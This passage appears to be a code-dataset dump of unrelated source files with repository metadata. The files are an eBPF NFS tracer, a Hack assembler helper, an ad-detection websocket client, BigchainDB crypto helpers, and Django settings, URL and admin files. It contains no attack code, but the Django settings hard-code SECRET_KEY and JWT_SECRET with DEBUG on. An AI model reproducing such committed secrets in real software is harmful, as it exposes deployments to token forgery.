if (qs.len == 0)
return 0;
bpf_probe_read_kernel(&data.file, sizeof(data.file), (void *)qs.name);
// output
events.perf_submit(ctx, &data, sizeof(data));
return 0;
}
int trace_file_open_return(struct pt_regs *ctx)
{
return trace_exit(ctx, TRACE_OPEN);
}
int trace_read_return(struct pt_regs *ctx)
{
return trace_exit(ctx, TRACE_READ);
}
int trace_write_return(struct pt_regs *ctx)
{
return trace_exit(ctx, TRACE_WRITE);
}
int trace_getattr_return(struct pt_regs *ctx)
{
return trace_exit(ctx, TRACE_GETATTR);
}
"""
# Substitute the latency threshold into the C source. A threshold of 0 turns
# the filter expression into a constant false, tracing every operation.
if min_ms == 0:
    bpf_text = bpf_text.replace('FILTER_US', '0')
else:
    bpf_text = bpf_text.replace('FILTER_US',
                                'delta_us <= %s' % str(min_ms * 1000))
# Substitute the PID filter; '0' means "never filtered out".
if args.pid:
    bpf_text = bpf_text.replace('FILTER_PID', 'pid != %s' % pid)
else:
    bpf_text = bpf_text.replace('FILTER_PID', '0')
# With --ebpf just dump the generated source and exit.
if debug or args.ebpf:
    print(bpf_text)
    if args.ebpf:
        exit()
# process event
# process event
def print_event(cpu, data, size):
    """Perf-buffer callback: decode one NFS event and emit it either as a CSV
    line (with -j) or as an InfluxDB row via write2db()."""
    event = b["events"].event(data)
    # Map the numeric operation code to its single-letter label; anything
    # other than 1/2/3 is treated as a read.
    type = {1: 'W', 2: 'O', 3: 'G'}.get(event.type, 'R')
    if csv:
        print("%d,%s,%d,%s,%d,%d,%d,%s" % (
            event.ts_us, event.task, event.pid, type, event.size,
            event.offset, event.delta_us, event.file))
        return
    # Build the database row: offset converted to KiB, latency to ms.
    test_data = lmp_data(
        datetime.now().isoformat(),
        'glob',
        event.task.decode('utf-8', 'replace'),
        event.pid,
        type,
        event.size,
        event.offset / 1024,
        float(event.delta_us) / 1000,
        event.file.decode('utf-8', 'replace'),
    )
    write2db(data_struct, test_data, influx_client, DatabaseType.INFLUXDB.value)
# Currently specifically works for NFSv4, the other kprobes are generic
# so it should work with earlier NFS versions
b = BPF(text=bpf_text)
# Entry probes record the start timestamp; matching return probes compute
# the latency and emit the event.
b.attach_kprobe(event="nfs_file_read", fn_name="trace_rw_entry")
b.attach_kprobe(event="nfs_file_write", fn_name="trace_rw_entry")
b.attach_kprobe(event="nfs4_file_open", fn_name="trace_file_open_entry")
b.attach_kprobe(event="nfs_file_open", fn_name="trace_file_open_entry")
b.attach_kprobe(event="nfs_getattr", fn_name="trace_getattr_entry")
b.attach_kretprobe(event="nfs_file_read", fn_name="trace_read_return")
b.attach_kretprobe(event="nfs_file_write", fn_name="trace_write_return")
b.attach_kretprobe(event="nfs4_file_open", fn_name="trace_file_open_return")
b.attach_kretprobe(event="nfs_file_open", fn_name="trace_file_open_return")
b.attach_kretprobe(event="nfs_getattr", fn_name="trace_getattr_return")
# Print the header matching the selected output format.
if(csv):
    print("ENDTIME_us,TASK,PID,TYPE,BYTES,OFFSET_b,LATENCY_us,FILE")
else:
    if min_ms == 0:
        print("Tracing NFS operations... Ctrl-C to quit")
    else:
        print("""Tracing NFS operations that are slower than \
%d ms... Ctrl-C to quit"""
              % min_ms)
    print("%-8s %-14s %-6s %1s %-7s %-8s %7s %s" % ("TIME",
                                                    "COMM",
                                                    "PID",
                                                    "T",
                                                    "BYTES",
                                                    "OFF_KB",
                                                    "LAT(ms)",
                                                    "FILENAME"))
# Poll the perf buffer until interrupted.
b["events"].open_perf_buffer(print_event, page_cnt=64)
while 1:
    try:
        b.perf_buffer_poll()
    except KeyboardInterrupt:
        exit()
|
[
"1312945441@qq.com"
] |
1312945441@qq.com
|
718c62eeccf0f11bb86cb779a70c8baebb6c6d22
|
66276c6773b1c92f4d5c20a69c3cf8720ddb86ca
|
/07/Project7Template/Project7IO.py
|
8eae7cb0a8012d5d8db69c1a993fcda89070fe21
|
[] |
no_license
|
duffrind/ComputerArch
|
f5617dc835673da3f922ce4034b069059e88dc9a
|
9ee2034bb993ae7d1e37dd3077b564eac48298d7
|
refs/heads/master
| 2020-06-28T15:56:57.536061
| 2016-11-22T16:28:23
| 2016-11-22T16:28:23
| 74,491,534
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,270
|
py
|
import sys
inputsofar = []
inputfile = ""
nextidx = 0
def setFile(fname):
    """Open `fname` as the input source and reset the line cache/cursor."""
    global inputfile, nextidx, inputsofar
    # NOTE(review): a previously opened file is never closed here.
    inputfile = open(fname, "r")
    nextidx = 0
    inputsofar = []
def setSaveFile(path):
    """Redirect all subsequent print() output into the file at `path`."""
    # Closes the current stdout first — irreversible when that is the real
    # process stdout.
    sys.stdout.close()
    sys.stdout = open(path,"w")
def rewind():
    """Move the read cursor back to the first cached line so nextLine()
    replays the input from the beginning."""
    global nextidx
    nextidx = 0
def nextLine():
    """Return the next significant input line with // comments stripped.

    Lines are cached in `inputsofar` so rewind() can replay them; once the
    input is exhausted the sentinel string "EOF" is returned (and cached, so
    later calls keep returning it).
    """
    global nextidx, inputsofar, inputfile
    if nextidx < len(inputsofar):
        # Replaying from the cache after a rewind().
        nextidx = nextidx+1
        return inputsofar[nextidx-1]
    elif len(inputsofar) > 0 and inputsofar[-1] == "EOF":
        # End of input was already reached earlier.
        return "EOF"
    else:
        line = ""
        while True:
            if inputfile == "":
                # No file configured: read interactively from stdin.
                line = input()
            else:
                line = inputfile.readline()
            # Skip blank lines and full-line // comments. A zero-length read
            # means end of file and must break out of the loop.
            if line.strip()[0:2] != "//" and (len(line) == 0 or line.strip()!="") :
                break
        if line == "":
            line = "EOF"
        # Drop a trailing // comment, if present.
        if line.find("//") != -1:
            line = line[0:line.find("//")]
        line = line.strip()
        inputsofar.append(line.strip())
        nextidx = nextidx+1
        return line.strip()
def printAddress(s):
    """Print the value of the decimal string `s` as a 16-bit binary word."""
    value = int(s)
    word = bin(value)[2:].zfill(16)
    print(word)
def printCommand(f,c,d,j):
    """Print the four instruction fields concatenated on a single line."""
    print("".join(map(str, (f, c, d, j))))
|
[
"duffrind@uwplatt.edu"
] |
duffrind@uwplatt.edu
|
8820cf9efc88709ad693aef34b203b303d802d0d
|
ae9345588b78d96444a81f9d70a1811b20880941
|
/update_handler.py
|
d031515143f5ea9a11ec228b4fd1d1ccb95b2432
|
[] |
no_license
|
Honigchnuschperli/WerbeSkip
|
91d905d2d890eba6309fc7a531f9ac8f91536af2
|
3c972ebd16a40b034f8811a40434f0c410563beb
|
refs/heads/master
| 2020-04-07T16:57:55.410698
| 2018-11-20T22:00:04
| 2018-11-20T22:00:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,909
|
py
|
from deepnet import Network
import numpy as np
from deepnet.functions.costs import CrossEntropyCost
from helperfunctions.image_processing.retrieving_images import VideoCapture
from deepnet.layers import FullyConnectedLayer, BatchNorm, Dropout, ReLU, SoftMax, ConvolutionLayer, MaxPoolLayer, \
Flatten
from deepnet.optimizers import Adam
import json
import websockets
import asyncio
from settings_secret import websocket_token
import warnings
import os
class WerbeSkip(object):
    """Streams TV frames, classifies ad/no-ad with a CNN, smooths the raw
    predictions, and pushes the verdict to a websocket channel."""

    def __init__(self):
        self.PATH_TO_NET = os.path.join(os.path.dirname(__file__),
                                        "helperfunctions/prosieben/networks/teleboy/teleboy_old.h5")
        self.ws = None
        self.loop = None
        self.network = self.init_network()
        # DJANGO_DEBUG being set is used as a proxy for "running in Docker".
        self.docker = bool(os.environ.get("DJANGO_DEBUG", False))
        if self.docker:
            self.ip = "104.248.102.130:80"
        else:
            self.ip = "127.0.0.1:8000"
        # Prosieben: 354
        # SRF: 303
        self.cap = VideoCapture(channel=354, colour=False, rate_limit=1, convert_network=True, proxy=True, use_hash=False)
        self.filters = []      # 0/1 per frame: logo confidently seen in recent window
        self.result = []       # smoothed ad/no-ad decisions
        self.predictions = []  # raw per-frame logo probabilities
        self.filter_size = 25  # look-back window for the confidence filter
        self.chain_size = 5    # equal consecutive filter values needed to switch state

    def init_network(self):
        """Build the CNN architecture and load the pretrained weights."""
        net = Network()
        net.input((1, 180, 320))
        net.add(
            ConvolutionLayer(n_filter=16, width_filter=12, height_filter=8, stride=4, zero_padding=0, padding_value=1))
        net.add(BatchNorm())
        net.add(ReLU())
        net.add(
            ConvolutionLayer(n_filter=64, width_filter=6, height_filter=4, stride=1, zero_padding=2, padding_value=1))
        net.add(BatchNorm())
        net.add(ReLU())
        net.add(MaxPoolLayer(width_filter=3, height_filter=3, stride=2))
        net.add(ConvolutionLayer(n_filter=128, width_filter=4, height_filter=4, stride=1))
        net.add(BatchNorm())
        net.add(ReLU())
        net.add(ConvolutionLayer(n_filter=128, width_filter=3, height_filter=3, stride=2))
        net.add(BatchNorm())
        net.add(ReLU())
        net.add(ConvolutionLayer(n_filter=256, width_filter=3, height_filter=3, stride=1))
        net.add(BatchNorm())
        net.add(Dropout(0.75))
        net.add(Flatten())
        net.add(FullyConnectedLayer(512))
        net.add(BatchNorm())
        net.add(ReLU())
        net.add(Dropout(0.5))
        net.add(FullyConnectedLayer(2))
        net.add(SoftMax())
        optimizer = Adam(learning_rate=0.001)
        net.regression(optimizer=optimizer, cost=CrossEntropyCost())
        net.load(self.PATH_TO_NET)
        return net

    async def init_db(self, websocket):
        """Announce the tracked channel(s) to the server."""
        message = {"command": "init", "channel": {"Prosieben": {"id": 354}}, "token": websocket_token}
        await websocket.send(json.dumps(message))

    async def producer_handler(self, websocket):
        """Push one prediction message per captured frame, forever."""
        while True:
            message = self.producer()
            await websocket.send(json.dumps(message))

    def producer(self):
        """Build the websocket update message for the next frame."""
        channel = self.get_prediction()
        message = {"command": "update", "room": 'main', "channel": channel, "token": websocket_token}
        return message

    def get_prediction(self):
        """Classify the next frame and return the smoothed channel state.

        NOTE(review): self.result[-1] raises IndexError while `result` is
        still empty (first frames with an unconfident positive filter) —
        confirm whether a warm-up seed value is needed.
        """
        img = next(self.cap)
        prediction = self.network.feedforward(img)
        self.predictions.append(prediction[0, 1])
        snippet = self.predictions[-self.filter_size:]
        if np.any(np.array(snippet) > 0.9):  # checks if network is sure that it found a logo
            self.filters.append(1)
        else:
            self.filters.append(0)
        last_filter = self.filters[-1]
        if np.all(np.array(self.filters[-self.chain_size:]) == last_filter):  # checks if the last values are the same
            if last_filter == 1:
                if np.mean(self.predictions[-self.chain_size:]) > 0.9:
                    self.result.append(last_filter)
                else:
                    self.result.append(self.result[-1])
            else:
                self.result.append(last_filter)
        else:
            self.result.append(self.result[-1])
        self.clean_up()
        return {"Prosieben": {"ad": self.result[-1], "id": 354}}

    def clean_up(self):
        """Trim the history buffers so memory use stays bounded."""
        if len(self.predictions) > 2 * self.filter_size and len(self.filters) > 2 * self.chain_size:
            self.filters.pop(0)
            self.result.pop(0)
            self.predictions.pop(0)

    async def consumer_handler(self, websocket):
        """Drain incoming server messages forever."""
        while True:
            async for message in websocket:
                await self.consumer(message)
            # Fixed: the original called asyncio.sleep(0) without awaiting it,
            # which does nothing; award it to yield control to the event loop.
            await asyncio.sleep(0)

    async def consumer(self, message):
        """Log any error the server reports back over the socket.

        Fixed: this must be a coroutine because consumer_handler awaits it;
        awaiting the original plain method raised TypeError at runtime.
        """
        error = json.loads(message).get('error', None)
        if error:
            print('GOT ERROR FROM SOCKET:', error)

    async def handler(self, websocket):
        """Run producer and consumer concurrently; cancel the survivor once
        either side finishes."""
        consumer_task = asyncio.ensure_future(self.consumer_handler(websocket))
        producer_task = asyncio.ensure_future(self.producer_handler(websocket))
        done, pending = await asyncio.wait(
            [consumer_task, producer_task],
            return_when=asyncio.FIRST_COMPLETED,
        )
        for task in pending:
            task.cancel()

    def run(self):
        """Connect to the websocket endpoint and process frames until the
        connection drops."""
        async def hello():
            async with websockets.connect('ws://' + self.ip + '/chat/stream/') as websocket:
                print("connected")
                await self.init_db(websocket)
                await self.handler(websocket)
        print("starting")
        self.loop = asyncio.get_event_loop()
        self.loop.run_until_complete(hello())
if __name__ == "__main__":
    # Fixed: if WerbeSkip() itself raised, `x` was unbound and the finally
    # block raised NameError, masking the original error. Pre-bind x and
    # only clean up once construction succeeded.
    x = None
    try:
        x = WerbeSkip()
        x.run()
    finally:
        if x is not None:
            x.cap.pipe.kill()  # not sure if pipe still runs after it shuts down or the programm exits
            x.cap.m3u8_update_thread.stop()  # stopping gracefully
            x.cap.get_images_thread.stop()  # stopping gracefully
        print("exit")
|
[
"georg.schwan@edubs.ch"
] |
georg.schwan@edubs.ch
|
06aa92289a08745e863072806861d725ea5fcb94
|
402c2dfec6fd00be0e4bce7248b3b22eec504c80
|
/Enterprise/BlockChain/Server/bigchaindb/bigchaindb/common/crypto.py
|
a8e42c52b7882ddb11ebe3e753e8a7d19ce62071
|
[
"CC-BY-4.0",
"Apache-2.0",
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
NP-compete/Alternate-Authentication
|
7d81b8faaafe60470100140110023992cbb5d0dc
|
b2a04ecbc57292c2c87293458cc1931ab47f43f2
|
refs/heads/master
| 2022-12-21T15:47:24.349972
| 2021-04-06T13:07:56
| 2021-04-06T13:07:56
| 179,950,584
| 12
| 6
|
MIT
| 2022-12-09T19:33:50
| 2019-04-07T10:35:26
|
Python
|
UTF-8
|
Python
| false
| false
| 1,847
|
py
|
# Copyright BigchainDB GmbH and BigchainDB contributors
# SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0)
# Code is Apache-2.0 and docs are CC-BY-4.0
# Separate all crypto code so that we can easily test several implementations
from collections import namedtuple
import sha3
from cryptoconditions import crypto
# Immutable (private_key, public_key) pair returned by the key helpers below.
CryptoKeypair = namedtuple('CryptoKeypair', ('private_key', 'public_key'))
def hash_data(data):
    """Hash the provided data using SHA3-256"""
    digest = sha3.sha3_256(data.encode())
    return digest.hexdigest()
def generate_key_pair():
    """Generates a cryptographic key pair.

    Returns:
        :class:`~bigchaindb.common.crypto.CryptoKeypair`: A
        :obj:`collections.namedtuple` with named fields
        :attr:`~bigchaindb.common.crypto.CryptoKeypair.private_key` and
        :attr:`~bigchaindb.common.crypto.CryptoKeypair.public_key`.
    """
    # TODO FOR CC: Adjust interface so that this function becomes unnecessary
    private_key, public_key = [k.decode() for k in crypto.ed25519_generate_key_pair()]
    return CryptoKeypair(private_key, public_key)
# Re-export the cryptoconditions Ed25519 key classes under BigchainDB names.
PrivateKey = crypto.Ed25519SigningKey
PublicKey = crypto.Ed25519VerifyingKey
def key_pair_from_ed25519_key(hex_private_key):
    """Generate base58 encode public-private key pair from a hex encoded private key"""
    # Only the first 32 bytes form the Ed25519 seed; any extra bytes (e.g. an
    # appended public key in 64-byte encodings) are ignored.
    priv_key = crypto.Ed25519SigningKey(bytes.fromhex(hex_private_key)[:32], encoding='bytes')
    public_key = priv_key.get_verifying_key()
    return CryptoKeypair(private_key=priv_key.encode(encoding='base58').decode('utf-8'),
                         public_key=public_key.encode(encoding='base58').decode('utf-8'))
def public_key_from_ed25519_key(hex_public_key):
    """Generate base58 public key from hex encoded public key"""
    raw = bytes.fromhex(hex_public_key)
    verifying_key = crypto.Ed25519VerifyingKey(raw, encoding='bytes')
    return verifying_key.encode(encoding='base58').decode('utf-8')
|
[
"soham.dutta.analyst@gmail.com"
] |
soham.dutta.analyst@gmail.com
|
fce35982f9723fe77d4de5712ed7ee3235d59e20
|
b89c89c2bb13e6c642af3fb71e482a60f1291c2c
|
/loss_metrics/loss_and_metrics.py
|
079747b39d9337b5824e4fe73ba367277ee22acd
|
[] |
no_license
|
fang-h/lane-segmentation
|
0357698ddcec73d085d4dcd9ea1a652a83f053ed
|
523169d9c2edec3389eea6ad26c67b08beb1b512
|
refs/heads/master
| 2021-01-02T19:46:04.130520
| 2020-04-02T01:22:13
| 2020-04-02T01:22:13
| 239,772,067
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,139
|
py
|
"""use CrossEntropy Loss as the cost loss for class every pixel,
and use miou as the metrics to evaluate the performance of the model"""
import torch.nn as nn
import numpy as np
class Loss(nn.Module):
    """Pixel-wise cross-entropy loss over `num_classes` classes.

    Accepts logits shaped [N, C, ...] and integer targets shaped [N, ...];
    both are flattened so every pixel is scored independently and the mean
    loss over all pixels is returned.
    """

    def __init__(self, num_classes):
        super(Loss, self).__init__()
        self.num_classes = num_classes

    def forward(self, input, target):
        # Flatten the logits to [P, C] where P is the total pixel count.
        if input.dim() > 2:
            flat = input.view(input.size(0), input.size(1), -1)   # [N, C, H*W]
            flat = flat.transpose(1, 2)                           # [N, H*W, C]
            input = flat.contiguous().view(-1, self.num_classes)  # [P, C]
        # Flatten the targets to [P].
        target = target.view(-1)
        criterion = nn.CrossEntropyLoss(reduction='mean')
        return criterion(input, target)
def compute_iou(pred, gt, result, num_classes=8):
    """Accumulate per-class intersection/union pixel counts into `result`.

    Args:
        pred: predicted label map (torch tensor of class indices).
        gt: ground-truth label map, same shape as `pred`.
        result: dict with "intersection" and "union" sequences of at least
            `num_classes` entries, updated in place.
        num_classes: number of classes to score. Defaults to 8, the value
            previously hard-coded for the lane-segmentation task, so existing
            callers are unaffected.

    Returns:
        The same `result` dict, for convenience.
    """
    pred = pred.numpy()
    gt = gt.numpy()
    for i in range(num_classes):
        single_gt = gt == i
        single_pred = pred == i
        intersection = np.sum(single_gt * single_pred)  # pixels both masks agree on
        union = np.sum(single_pred) + np.sum(single_gt) - intersection
        result["intersection"][i] += intersection
        result["union"][i] += union
    return result
|
[
"2901765507@qq.com"
] |
2901765507@qq.com
|
d159b9494bfd77cbe888a1b6d648d4096b59556c
|
ef27ed447844a366b4d07edceee720ab82b746dd
|
/django_project/django_project/urls.py
|
d244d6a059eaf280013502b7d369e17c483f9574
|
[] |
no_license
|
Achyuthkodali/django_venv_3
|
e896ffca774d6d1977046140321b394009e959bd
|
712c9ddaa88ecf41f663d5b888eb46fc752dd3c5
|
refs/heads/master
| 2020-03-26T18:18:05.772674
| 2018-08-18T09:16:37
| 2018-08-18T09:16:37
| 145,206,500
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 950
|
py
|
"""django_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
from .views import *
# URL table for the SSO service: Django admin plus two auth endpoints.
# check_login / check_register come from `from .views import *` above.
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url(r'^login_auth', check_login),
    url(r'^register_auth', check_register)
]
|
[
"achyuth.kodali97@gmail.com"
] |
achyuth.kodali97@gmail.com
|
7247f79d3ab7ff01f1865f3f995792b09337f488
|
562729b6bd37293bf2dd0303dd52234dde70c3fd
|
/kinlin/core/project.py
|
a1812fa8fd13331ae78df31ba3c23b17f9074bb6
|
[
"MIT"
] |
permissive
|
the-lay/kinlin
|
887fc97abbbefc14a59ac5096ece713b421a4051
|
ce7c95d46d130049e356104ba77fad51bc59fb3f
|
refs/heads/master
| 2022-02-26T08:46:31.261367
| 2019-10-19T23:20:55
| 2019-10-19T23:20:55
| 211,645,782
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 844
|
py
|
from typing import List
from .utils import *
from .experiment import Experiment
class Project:
    """Named container for a set of experiments, persisted in its own folder."""

    def __init__(self, name: str = 'Untitled Project', notes: str = '', path: Union[Path, str] = None):
        # general properties
        self.id: str = generate_random_id()     # random identifier for this project
        self.name: str = name                   # human-readable name
        self.fname: str = generate_fname(name)  # filesystem-safe folder name
        self.notes: str = notes
        # NOTE(review): Path(__file__).resolve() points at this *module file*,
        # so the project folder is rooted under the file path itself; `.parent`
        # was probably intended. The `path` parameter is accepted but never
        # used. Confirm intent before changing.
        self.path = Path(__file__).resolve() / self.fname
        create_dir_for(self.path, self.name)
        # experiments
        self.experiments: List[Experiment] = []

    def new_experiment(self, name: str):
        """Create and register a new experiment (not implemented yet)."""
        # new_exp = Experiment(project=self)
        # setup experiment?
        # self.experiments += new_exp
        pass

    def continue_experiment(self):
        """Resume a previously created experiment (not implemented yet)."""
        pass

    def open_experiment_folder(self):
        """Open the project's folder in the OS file browser."""
        open_folder(self.path)
|
[
"ilja.gubin@gmail.com"
] |
ilja.gubin@gmail.com
|
88191d016e68029871bcd820136aca3c950b9bb5
|
aa54e78c79268913f0f6bd0baf442aedd9488c6d
|
/project1/mysite/settings.py
|
60cb7d1c50efda97a46f7d3111a65d97a3e4f710
|
[] |
no_license
|
theycallmereza/SSO_DRF
|
91c1b23ec77457d04486414ba06e62fe67875ea0
|
732c1b18fd8904a18d1d05abdcd05b3a189a2ac9
|
refs/heads/main
| 2022-12-31T18:07:52.274962
| 2020-10-20T09:42:38
| 2020-10-20T09:42:38
| 305,660,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,395
|
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): SECRET_KEY and JWT_SECRET are committed to source control;
# load them from the environment before any production deployment.
SECRET_KEY = 'vk%v)!xp!%z@on81od4w@73b_s@*tl9feg6&d9raq5hm92r'
# Separate key used to sign JWTs issued by simplejwt (see SIMPLE_JWT below).
JWT_SECRET = 'hf^(i($8c@*_m9dw7l6txm4veknd4&)xierp7cbe_gcb%s#n+#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
    'users.apps.UsersConfig',  # local SSO users app
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
REST_FRAMEWORK = {
    # API requests authenticate exclusively with a JWT; no session fallback.
    'DEFAULT_AUTHENTICATION_CLASSES': (
        'rest_framework_simplejwt.authentication.JWTTokenUserAuthentication',
    )
}
SIMPLE_JWT = {
    'SIGNING_KEY': JWT_SECRET,
}
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
|
[
"mrreza1394@gmail.com"
] |
mrreza1394@gmail.com
|
1b7dd8b14c2820ca1ea9341ae38572dbd762f427
|
2d82d4c6574bd6d32f2cf1c781615f7951f55f66
|
/muntjac/demo/sampler/features/commons/Tooltips.py
|
33a405640b2f7a58de9da8da0ff08594edf9c4c6
|
[
"Apache-2.0"
] |
permissive
|
metaperl/muntjac
|
f83f745ee03942a61af92ee7fba7285aa9c46f3c
|
8db97712edd81b4d25deaaa48587d2a08010f2c8
|
refs/heads/master
| 2021-01-15T22:04:25.057862
| 2012-11-09T03:52:59
| 2012-11-09T03:52:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 930
|
py
|
from muntjac.ui.abstract_component import AbstractComponent
from muntjac.demo.sampler.APIResource import APIResource
from muntjac.demo.sampler.Feature import Feature, Version
class Tooltips(Feature):
    """Sampler feature page describing component tooltips (descriptions)."""

    def getSinceVersion(self):
        # Present since the earliest tracked version.
        return Version.OLD

    def getName(self):
        # Title shown in the sampler's feature list.
        return 'Tooltips'

    def getDescription(self):
        # HTML-formatted blurb rendered on the feature page.
        return ('Most components can have a <i>description</i>,'
                ' which is usually shown as a <i>\"tooltip\"</i>.'
                ' In the Form component, the description is shown at the'
                ' top of the form.'
                ' Descriptions can have HTML formatted (\'rich\') content.<br/>')

    def getRelatedAPI(self):
        return [APIResource(AbstractComponent)]

    def getRelatedFeatures(self):
        # TODO Auto-generated method stub
        return None

    def getRelatedResources(self):
        # TODO Auto-generated method stub
        return None
|
[
"r.w.lincoln@gmail.com"
] |
r.w.lincoln@gmail.com
|
e883bb2b8fe918c70d9a1bd48a775eafad629add
|
66e58cba20414214ebca7bb4a035796d379f57f1
|
/myEnvironments/djangoEnv/bin/easy_install
|
3f468da3298dccfe2cb2e694063cb752ef85651d
|
[] |
no_license
|
NathanHaberman/Python-Flask-Django-CodingDojo
|
08623db1c1fa9076cd90901fed39678b2a8b795a
|
c6013c9e8133a7e2b70bfc357c3364edf3992d1c
|
refs/heads/master
| 2021-01-23T17:09:25.703718
| 2017-09-21T21:09:03
| 2017-09-21T21:09:03
| 102,763,626
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 307
|
#!/Users/nathanhaberman/Desktop/CodingDojo/Python-Stack/myEnvironments/djangoEnv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
    # setuptools console-script convention: strip a trailing "-script.py(w)"
    # or ".exe" suffix from argv[0] before delegating to easy_install's main().
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
|
[
"na.haberman@gmail.com"
] |
na.haberman@gmail.com
|
|
fa7d50f644f8083f0e9aa2de873152e9a024ecb6
|
f567981e9a655cee0c835aaaad2eb55bf5d02485
|
/hp/wsgi.py
|
e01ba6cc9e5f3bd1c40abaa4e3aa75f3e78709ff
|
[] |
no_license
|
43ndr1k/mezzanine-rest-api
|
b48b4db7b75d2acf18fa5e348d245f78ffb4352f
|
d6c6449a323ec605a569d8afcd0a1602549c7847
|
refs/heads/master
| 2021-01-13T00:38:02.834689
| 2015-11-28T13:14:11
| 2015-11-28T13:14:11
| 47,024,818
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 480
|
py
|
"""
WSGI config for hp project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
from mezzanine.utils.conf import real_project_name
# Resolve the settings module from the real project name (Mezzanine helper)
# so the project can be renamed without editing this file.
os.environ.setdefault("DJANGO_SETTINGS_MODULE",
                      "%s.settings" % real_project_name("hp"))
application = get_wsgi_application()
|
[
"dj-blackfire@gmx.de"
] |
dj-blackfire@gmx.de
|
5eec26bd85986778f068ccd0602f46212dc55208
|
d19a3a03a74fb9756e426099610acf19c2373399
|
/app_sancho/admin.py
|
c5ec937f6f19381879736285931b40b28e0cf814
|
[] |
no_license
|
bogdanned/dulcinea
|
68c55cf337088e3af9de0ed6f5d3da4bfbfafa10
|
5d2b028183e942dafb0b60008f58e384bceaf2e2
|
refs/heads/master
| 2022-01-13T02:04:34.815437
| 2016-08-11T00:18:21
| 2016-08-11T00:18:21
| 84,355,258
| 0
| 0
| null | 2022-01-10T14:09:55
| 2017-03-08T18:53:38
|
Python
|
UTF-8
|
Python
| false
| false
| 922
|
py
|
from django.contrib import admin
from .models import *
# Register your models here.
class CustomerAdminDatabaseInline(admin.TabularInline):
    # Inline table editor for the CustomerDatabase rows attached to a Customer.
    model = CustomerDatabase
    fk_name = "customer"
class CustomerAdminStackInline(admin.TabularInline):
    # Inline table editor for the CustomerStack rows attached to a Customer.
    model = CustomerStack
    fk_name = "customer"
class CustomerAdmin(admin.ModelAdmin):
    # Customer change page with its databases and stacks editable inline.
    model = Customer
    inlines = [
        CustomerAdminDatabaseInline,
        CustomerAdminStackInline,
    ]
class ProductAdmin(admin.ModelAdmin):
    # Product list view: key columns plus a category filter sidebar.
    list_display = ['customer_product_id','name','created','price']
    list_filter = ['category']
class CategoryAdmin(admin.ModelAdmin):
    # Category list view showing the parent-category relationship.
